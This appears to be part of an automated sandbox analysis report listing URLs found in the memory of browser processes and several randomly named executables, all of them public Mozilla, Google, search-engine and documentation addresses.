Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lg
Source: 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=1
Source: 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=16963322
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000022.00000002.3012666768.00006DEC00B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998895852.00006DEC0042C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2933467588.00006DEC000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2936577004.00006DEC0017C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002436204.00006DEC00628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000022.00000002.3007057295.00006DEC008D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000022.00000003.2847391692.000048F0002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2847560818.000048F0002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002750216.00006DEC00660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2933102263.00006DEC000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3003556624.00006DEC006F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002128527.00006DEC00614000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995213268.00006DEC00290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bm
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000022.00000002.3012666768.00006DEC00B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002750216.00006DEC00660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2900670128.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000022.00000003.2871824121.00006DEC00498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000022.00000002.2997133327.00006DEC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000022.00000002.2998024266.00006DEC0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3003556624.00006DEC006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3368256754.0000024F73ADC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3014729534.00006DEC00C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab3
Source: chrome.exe, 00000022.00000002.3003171789.00006DEC006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
